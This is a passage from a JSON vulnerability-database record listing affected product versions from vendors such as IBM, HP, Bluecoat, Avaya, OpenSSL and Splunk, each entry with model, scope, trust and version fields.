        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.6.10"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "norman shark scada protection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.3.2"
      },
      {
        "model": "security network intrusion prevention system gx5208",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "12500(comware",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "v7)0"
      },
      {
        "model": "bladecenter -h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8852"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "bladecenter -ht",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8750"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.5.1"
      },
      {
        "model": "security network intrusion prevention system gx5108",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.0.13"
      },
      {
        "model": "linux ia-64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": null,
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "57000"
      },
      {
        "model": "enterprise linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "6.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5.0"
      },
      {
        "model": "esxi",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.0"
      },
      {
        "model": "aspera console",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.3.1"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0.1"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "systems director common agent for linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5"
      },
      {
        "model": "r",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.3.2"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "norman shark network protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.2"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "cognos insight",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.0.1"
      },
      {
        "model": "esxi esxi550-20150110",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "5.5"
      },
      {
        "model": "kb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.8.0"
      },
      {
        "model": "switch series",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "129000"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.3"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet24d-2.08",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.6"
      },
      {
        "model": "i.10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "malware analysis appliance",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "4.2"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "project openssl 0.9.8za",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "security analytics platform",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.0"
      },
      {
        "model": "m.08",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "version control agent",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.4.1"
      },
      {
        "model": "security network intrusion prevention system gx5008",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "ssl visibility",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.8"
      },
      {
        "model": "project openssl 0.9.8q",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "sterling connect:express for unix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11"
      },
      {
        "model": "cacheflow",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.3"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.5.0.11150-11"
      },
      {
        "model": "systems insight manager",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.1"
      },
      {
        "model": "infosphere master data management provider hub",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.0"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-493"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.2"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.7"
      },
      {
        "model": "aura communication manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.8"
      },
      {
        "model": "ssl visibility 3.8.2f",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": null
      },
      {
        "model": "rational application developer for websphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.0.1"
      },
      {
        "model": "cloudsystem enterprise software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "8.0.2"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.6"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.6"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.3.6"
      },
      {
        "model": "rational software architect realtime edition",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "flex system fc3171 8gb san switch",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.3"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-453"
      },
      {
        "model": "security network intrusion prevention system gx7412-10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0"
      },
      {
        "model": "director",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1.16.1"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.3"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5.3"
      },
      {
        "model": "sterling connect:express for unix ifix",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4.6.1146-109"
      },
      {
        "model": "aura presence services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.1.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.1"
      },
      {
        "model": "tivoli netcool/system service monitor fp10",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.2"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4"
      },
      {
        "model": "proxysg sgos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5"
      },
      {
        "model": "project openssl 1.0.1c",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "6.0.4"
      },
      {
        "model": "ssl for openvms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.4-467"
      },
      {
        "model": "vb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "pureapplication system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.0"
      },
      {
        "model": "bladecenter -e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1881"
      },
      {
        "model": "connect:enterprise secure client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.4"
      },
      {
        "model": "smart analytics system",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "56001"
      },
      {
        "model": "ka",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.3.2"
      },
      {
        "model": "security analytics platform",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "7.1.6"
      },
      {
        "model": "office connect pk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "18100"
      },
      {
        "model": "storwize",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v5000-"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet21e-2.05",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "aspera proxy",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.2.2"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8v"
      },
      {
        "model": "norman shark network protection",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.3.2"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "project openssl 1.0.1f",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "yb",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "aspera connect server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.1"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.0.2"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.4.1"
      },
      {
        "model": "systems director storage control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.2.3.1"
      },
      {
        "model": "flex system chassis management module 1.40.0",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "tivoli provisioning manager for images",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.1.1.0"
      },
      {
        "model": "upward integration modules for microsoft system center",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "5.0.1"
      },
      {
        "model": "upward integration modules scvmm add-in",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.0.2"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.3"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.5"
      },
      {
        "model": "project openssl 0.9.8g",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "bcaaa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "5.5"
      },
      {
        "model": "nextscale n1200 enclosure fan power controller fhet24b-2.07",
        "scope": null,
        "trust": 0.3,
        "vendor": "ibm",
        "version": null
      },
      {
        "model": "cms r17",
        "scope": null,
        "trust": 0.3,
        "vendor": "avaya",
        "version": null
      },
      {
        "model": "flex system fc3171 8gb san switch and san pass-thru",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.5.03.00"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.41"
      },
      {
        "model": "aspera ondemand for google cloud",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.8.2.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.21"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.1.0.0"
      },
      {
        "model": "aura utility services sp7",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "initiate master data service",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.0"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.4"
      },
      {
        "model": "sterling file gateway",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "9.0"
      },
      {
        "model": "linux amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "security network intrusion prevention system gx6116",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "2.1"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.5.2"
      },
      {
        "model": "aspera console",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "2.5.3"
      },
      {
        "model": "insight control",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "4.63"
      },
      {
        "model": "e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "bladesystem c-class onboard administrator",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "4.20"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3.1"
      },
      {
        "model": "linux arm",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "10.04"
      },
      {
        "model": "tivoli workload scheduler for applications fp02",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.4"
      },
      {
        "model": "rational software architect",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.0"
      },
      {
        "model": "security network intrusion prevention system gx5008-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx3002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.3"
      },
      {
        "model": "linux lts amd64",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ubuntu",
        "version": "12.04"
      },
      {
        "model": "project openssl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0.2"
      },
      {
        "model": "project openssl beta2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "1.0"
      },
      {
        "model": "security network intrusion prevention system gx7800",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.2"
      },
      {
        "model": "bladecenter -s",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7779"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3"
      },
      {
        "model": "upward integration modules for vmware vsphere",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "3.5.3"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.2.2"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.1.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.2"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2"
      },
      {
        "model": "linux mips",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "debian",
        "version": "6.0"
      },
      {
        "model": "security network intrusion prevention system gx7412-05",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "splunk",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.10"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.3.20"
      },
      {
        "model": "splunk",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "splunk",
        "version": "5.0.11"
      },
      {
        "model": "tivoli netcool/system service monitor fp13",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "hp-ux b.11.11",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.5"
      },
      {
        "model": "aspera faspex",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.9"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.5"
      },
      {
        "model": "secure global desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "5.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.40"
      },
      {
        "model": "msr2000 r0106p18",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "va",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "0"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4.1"
      },
      {
        "model": "linux",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "slackware",
        "version": "14.1"
      },
      {
        "model": "security network intrusion prevention system gx5208-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6.1"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.32"
      },
      {
        "model": "aura application enablement services",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2"
      },
      {
        "model": "aspera ondemand for softlayer",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "cognos tm1",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "10.2.2"
      },
      {
        "model": "version control repository manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2"
      },
      {
        "model": "storage provisioning manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "2.4"
      },
      {
        "model": "tivoli netcool/system service monitor fp6",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.0.0"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.4"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.0.0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.6"
      },
      {
        "model": "aspera ondemand for azure",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "contactoptimization",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.0"
      },
      {
        "model": "r2311p05",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "5700"
      },
      {
        "model": "aspera shares",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "1.9"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.0"
      },
      {
        "model": "qradar risk manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.2.3"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1.1"
      },
      {
        "model": "security network intrusion prevention system gx5108-v2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.4"
      },
      {
        "model": "msm",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "hp",
        "version": "6.46.4.2.1"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.3.1"
      },
      {
        "model": "aix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.1"
      },
      {
        "model": "vios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.0"
      },
      {
        "model": "cloudsystem matrix",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.2"
      },
      {
        "model": "aspera connect server",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "3.5.2"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.5.0"
      },
      {
        "model": "aspera client",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "insight control server deployment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.2.1"
      },
      {
        "model": "project openssl 0.9.8l",
        "scope": null,
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1.1"
      },
      {
        "model": "version control repository manager 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "infosphere information server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "11.3"
      },
      {
        "model": "flex system fc3171 8gb san pass-thru",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "9.1"
      },
      {
        "model": "flex system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "1.3.20"
      },
      {
        "model": "matrix operating environment",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.4"
      },
      {
        "model": "system management homepage",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.1"
      },
      {
        "model": "systems director common agent for windows",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.4"
      },
      {
        "model": "aspera outlook plugin",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "asperasoft",
        "version": "0"
      },
      {
        "model": "content analysis system software",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "1.1.4.2"
      },
      {
        "model": "project openssl 0.9.8zc",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "openssl",
        "version": null
      },
      {
        "model": "project openssl h",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "oneview",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "1.01"
      },
      {
        "model": "campaign",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "8.0"
      },
      {
        "model": "system management homepage 7.4.0a",
        "scope": null,
        "trust": 0.3,
        "vendor": "hp",
        "version": null
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.2.1.0"
      },
      {
        "model": "director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "6.1.131"
      },
      {
        "model": "xcode",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "3.2.5"
      },
      {
        "model": "image construction and composition tool",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "2.2.1.3"
      },
      {
        "model": "security network intrusion prevention system gx4002",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "4.6"
      },
      {
        "model": "systems insight manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "hp",
        "version": "7.3"
      },
      {
        "model": "ssl visibility",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bluecoat",
        "version": "3.7"
      },
      {
        "model": "power hmc",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "7.7.3.0"
      },
      {
        "model": "aura session manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.2.3"
      },
      {
        "model": "project openssl i",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "openssl",
        "version": "0.9.8"
      },
      {
        "model": "aura system manager",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "avaya",
        "version": "6.3.2"
      },
      {
        "model": "systems director",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "6.3.1.0"
      },
      {
        "model": "storwize unified",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "ibm",
        "version": "v70001.4.2.0"
      },
      {
        "model": "freebsd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "freebsd",
        "version": "10.1"
      },
      {
        "model": "project openssl 1.0.0i",
